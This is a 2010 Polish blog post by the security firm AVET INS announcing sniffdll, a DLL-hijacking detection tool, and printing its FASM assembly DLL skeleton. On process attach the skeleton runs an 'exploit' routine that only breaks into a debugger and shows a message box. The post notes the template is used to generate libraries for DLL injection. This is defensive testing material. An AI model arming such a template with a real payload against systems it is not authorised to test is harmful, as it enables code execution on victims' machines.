Sniffdll: testowanie podatności DLL hijacking

2010-09-07 14:43

Klienci AVET INS korzystający z monitoringu otrzymali wcześniej narzędzie sniffdll wspomagające proces wykrywania podatności typu DLL hijacking w systemach Windows. Narzędzie to zostanie udostępnione publicznie za 14 dni.

Poniżej publikujemy przykładowy szkielet biblioteki DLL z jakiej korzystamy podczas testowania aplikacji pod kątem tej klasy podatności:

format PE DLL

entry DllEntryPointinclude 'win32ax.inc'section '.text' code readable executableproc DllEntryPoint hinstDLL,fdwReason,lpvReserved    cmp [fdwReason], DLL_PROCESS_ATTACH

    je pattach

    cmp [fdwReason], DLL_PROCESS_DETACH

    je pdetach

    cmp [fdwReason], DLL_THREAD_ATTACH

    je tattach

    cmp [fdwReason], DLL_THREAD_DETACH

    je tdetachexit:

    mov   eax,TRUE

    retpattach:

    call exploit

pdetach:

tattach:

tdetach:

    jmp exit

endpproc exploit

   mov edi, edi    ;simulate hotpatching entry   nop        ;make space/call for the debugger or

   int 3       ;detour if not using mov edi, edi for it

   nop   invoke MessageBox,NULL,'DLL Hijacker: exploit', 'Exploited',MB_ICONERROR+MB_OK

   ret

endp

section '.idata' import data readable writeable    library kernel,'KERNEL32.DLL',

        user,'USER32.DLL'    import user,

        MessageBox,'MessageBoxA'

Powyższy kod został napisany przy użyciu asemblera FASM. Kod pochodzi z naszego frameworku do testowania aplikacji. Szablon jak powyższy jest używany do generowania w locie różnych bibliotek np. do ataków typu dll injection. Dzięki użyciu asemblera wynikowe biblioteki są małe.

Blog

MS SQL Server 2005 Extended Support kończy się 12 kwietnia

Rozszerzone wsparcie dla serwera Microsoft SQL Server 2005 kończy się 12 kwietnia. To ostatni moment aby dokonać migracji do wyższej wersji.

Jeśli tego nie zrobiłeś to AVET INS może wesprzeć ...

2016-03-01 09:00, Czytaj więcej Więcej
Kiedy Flash wyginie?

Flash to jedna z tych technologii, która ma bardzo złą – i w tym wypadku całkowicie zasłużenie – reputację w obszarze bezpieczeństwa. Ta reputacja jest tak zła, że od jakiegoś czasu część ...

2016-02-11 16:45, Czytaj więcej Więcej
Krytyczna podatność w kliencie OpenSSH (CVE-2016-0777, CVE-2016-0778)

Wersje oprogramowania klienckiego OpenSSH w wersjach od 5.4 do 7.1 podatne są na atak umożliwiający wyciek pamięci oraz kradzież kluczy prywatnych. W przypadku, gdy połączenie SSH zostanie przerwane ...

2016-02-01 09:30, Czytaj więcej Więcej
Microsoft ogranicza wsparcie IE tylko do wersji 11

Microsoft przestaje wspierać starsze wersje przeglądarki Internet Explorer. Jedyną wspieraną wersją od dzisiaj jest IE 11 i wyższe. Dla wielu systemów (np. Windows 7) może to oznaczać potrzebę aktualizacji lub ...

2016-01-13 09:00, Czytaj więcej Więcej
SafeNet Day: Szyfrowanie w chmurze - prezentacja

Prezentacja Aleksandra Czarnowskiego z konferencji SafeNet Day na temat Szyfrowanie w chmurze jest już dostępna do pobrania. Zapraszamy do pobrania poniżej:

http://www.avet.com.pl/media/pdf/2015-11-02_Szyfrowanie_w_chmurze.pdf

2015-10-31 10:00, Czytaj więcej Więcej